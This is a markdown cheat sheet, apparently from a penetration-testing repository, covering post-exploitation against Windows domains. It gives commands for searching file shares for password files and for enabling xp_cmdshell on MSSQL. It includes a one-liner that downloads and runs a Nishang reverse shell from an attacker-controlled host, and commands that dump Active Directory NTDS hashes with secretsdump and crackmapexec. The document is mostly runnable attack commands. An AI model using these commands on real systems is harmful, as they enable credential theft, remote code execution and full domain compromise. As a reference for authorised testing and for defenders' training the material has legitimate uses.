Skip to content

Latest commit

 

History

History
141 lines (85 loc) · 2.94 KB

8 - Post-Exploitation.md

File metadata and controls

141 lines (85 loc) · 2.94 KB

File Shares (from Linux)

Powerview Find-InterestingFile

Plunder http://joshstone.us/plunder/

CrackMapExec

Mount Windows Shares:

apt-get install -y cifs-utils
mount -t cifs -o ro,domain=[domain],username=[username],password=[password],sec=ntlmv2 //hostnameOrIP/Share /path/to/localdir

-OR-

mount.cifs //172.16.42.52/C /root/share -o username=<user>

Search file contents:

grep -irn --include \*.txt --include \*.doc --include \*.xls --include \*.xlsx passw

Search file names:

find . -iname "*passw*" | grep -e '\.txt$' -e '\.xlsx$' -e '\.xls$' -e '\.doc$'

File Shares (from Windows)

Lauch a cmd prompt as another user:

runas /netonly /user:[Domain]\[username] cmd.exe

Start PowerShell:

powershell -nop -exec bypass
Import-Module [full path to PowerView.ps1]

Verify you have authenticated access:

Get-NetDomainControllers

Run Invoke-ShareFinder:

Invoke-ShareFinder -Verbose -HostList [./hostlist.txt] -ExcludeStandard -CheckShareAccess | Out-File -Encoding ASCII Found-Shares.txt

Find Interesting Files:

Invoke-FileFinder [Optional: -ShareList shares.txt] -Terms [comma seperated terms] -OutFile interesting_files.csv

Databases

In addition to RDP'ing into a host to run MS database tools, you can use DBVisualizer (free) over sshuttle, Metasploit, and SQShell.

PowerUpSQL

Lauch a cmd prompt as another user:

runas /netonly /user:[Domain]\[username] cmd.exe

Start PowerShell:

powershell -nop -exec bypass
Import-Module [full path to PowerUpSQL.psd1]

Verify you have authenticated access:

Get-NetDomainControllers

MSSQL Server Discovery:

Get-SQLInstanceDomain -Verbose

Easy Server Auditing:

Invoke-SQLDumpInfo -Verbose -Instance "SQLServer1\STANDARDDEV2014"

... review output csv files.

Invoke-SQLAudit -Verbose -Instance "SQLServer1\STANDARDDEV2014"

Automation:

$Servers = Get-SQLInstanceDomain –Verbose | Get-SQLConnectionTestThreaded –Verbose –Threads 10 | Where-Object {$_.Status –eq “Accessible”}
$Servers | Get-SQLServerInfo –Verbose
$Servers | Invoke-SQLAudit -Verbose

Metasploit: auxiliary/admin/mssql/mssql_findandsampledata

SQShell: http://joshstone.us/sqshell/

sqsh connect:

sqsh -S [Server IP] -U sa -P [password]

Execute commands:

xp_cmdshell 'whoami'
go

Enable xp_cmdshell:

EXEC SP_CONFIGURE 'xp_cmdshell', 1
reconfigure
go

Rotten Potato

xp_cmdshell "whoami /priv"

Look for "SeImpersonatePrivilege

Get a reverse shell (Use Nishang Invoke-PowerShellTcp.ps1):

xp_cmdshell "powershell IEX(New-Object Net.webclient).downloadString('http://[PTK IP]/[port]/[scriptname.ps1]')"
go

Dump Active Directory database (ntds) hashes

/opt/impacket/examples/secretsdump.py [Domain]/[username]@[DC FQDN] | tee /path/to/outputfile

-OR-

crackmapexec smb [IP] -u [username] -p [password] --ntds drsuapi

Output log of cme will be in /root/.cme/logs

SharePoint

CrackMapExec invoke_sessiongopher module